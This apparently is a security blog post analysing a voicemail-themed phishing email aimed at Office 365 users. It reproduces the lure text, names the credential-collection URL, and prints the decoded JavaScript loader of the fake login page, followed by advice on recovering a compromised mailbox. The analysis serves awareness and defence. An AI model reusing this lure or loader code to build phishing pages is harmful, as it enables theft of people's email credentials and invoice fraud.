You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING!!

You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING

You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021  - SPAM WARNING!!

 

This message has been seen going out to Office 365 and other clients.

Beware!!! - This email is a phishing trick to get your password for Office 356 and may also contain malware to damage or compromise your computer:

 

Hello Recipient,

Your cal­ler le­ft you 3 v­o­ic­em­ai­l me­s­sa­ges.

V­oi­ce - Mes­sa­ge for: [email protected] (MI­SS­ED CA­LL­S)

CAL­LER NUM­BER : +44 335970973

Pl­ea­se do­w­nlo­ad at­ta­chm­ent to li­ste­n to Me­ss­age

Mes­sa­ges wi­ll au­to dele­te in 2 h­ou­rs

As you can see it appears to just record the email address:

The site to which your credentials will be sent appears to be: http://mtu.edu.ng/wp-content/uploads/2020/9/9/h.php encrypted with Base64 in the JavaScript code on the site:

Their code site appears to be (or have been) protected by Cloudflare who really do need to check on their customers a little more closely.

 Then their html code in Base64 reads:

<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"
integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="
crossorigin="anonymous"
></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.8/FileSaver.min.js"
integrity="sha256-FPJJt8nA+xL4RU6/gsriA8p8xAeLGatoyTjldvQKGdE="
crossorigin="anonymous"
></script>
</head>
<body>
<div id="capture" style="padding: 10px; color: black"></div>
<script type="text/javascript">
try {
var email = atob(e);
} catch (e) {
var email = e;
}
var domain = e.split("@");

setTimeout(() => {
loadPages(
eur +
"?e=" +
e +
"&ep=" +
ep +
"&en=" +
btoa(e) +
"&eu=" +
domain[1]
);
}, 2000);

function loadPages(load) {

var testURL = load;

$.ajax({
url: atob(hp),
method: "POST",
data: { url: testURL },
success: function (response) {
response = response.replace(/href="\//g, 'href="' + testURL + "/");
response = response.replace(/src="\//g, 'src="' + testURL + "/");
response = response.replace(
/content="\//g,
'content="' + testURL + "/"
);

$("#capture").html(response);
// console.log(response);

},
});
}

</script>
</body>
</html>

This code is designed to impersonate the Office 365 login and send your pass word to the hackers so that they can use your credentials to compromise you in some way. Often they are looking for email accounts that they can take control of that deal with invoicing etc. so that they can put fake account details in to try and defraud companies or people.

If you have ever put your email credentials into a page that suddenly redirects you to somewhere unexpected or to your home Office 365 page when you were being asked for access codes, change your password immediately and check your mail account for mailbox rules that you did not create. Typically they pick one person to try and defraud and then make up rules in your mailbox so that you do not see any replies from that person that may give the game away.

If you suspect you have had your mailbox compromised, contact all your friends or suppliers and warn them to be vigilant.

Comments (1) -

Add comment